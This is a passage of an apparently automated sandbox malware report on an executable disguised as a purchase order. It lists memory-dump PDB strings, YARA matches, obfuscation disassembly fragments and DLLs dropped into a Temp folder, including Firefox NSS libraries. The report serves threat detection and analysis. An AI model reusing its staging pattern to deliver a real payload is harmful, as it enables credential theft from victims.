                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162881339.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7163552141.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158930983.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158247147.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7158985607.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: qipcap.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: msvcp140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: ucrtbase.pdbUGP source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7151568728.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7137545133.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7157618680.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196659326.000000001E664000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7161475490.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7161350303.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197291781.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
                    Source: Binary string: qipcap.pdb0 source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
                    Source: Binary string: D:\Kelly1076\__HITDisplay__\00_Code\ProArt Code_Git\ProArt\x64\Release\WMIMethod.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

                    Data Obfuscation

                    barindex
                    Source: Yara matchFile source: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_10002DE0 push eax; ret
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041264D4 push 0000001Bh; retf
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04129508 pushad ; ret
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041235B8 push ebp; iretd
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122694 push FFFFFFA5h; iretd
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412478E push EB0001E7h; ret
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122FD1 pushad ; ret
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122171 push edx; iretd
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04122235 push edx; iretd
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412631B push ss; iretd
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_0412635C push esp; ret
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_04123BAE push cs; retf
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeCode function: 1_2_041233D9 pushfd ; ret
                    Source: WMIMethod.dll.1.drStatic PE information: section name: _RDATA
                    Source: qipcap.dll.1.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.5.drStatic PE information: section name: .didat
                    Source: api-ms-win-core-console-l1-1-0.dll.5.drStatic PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
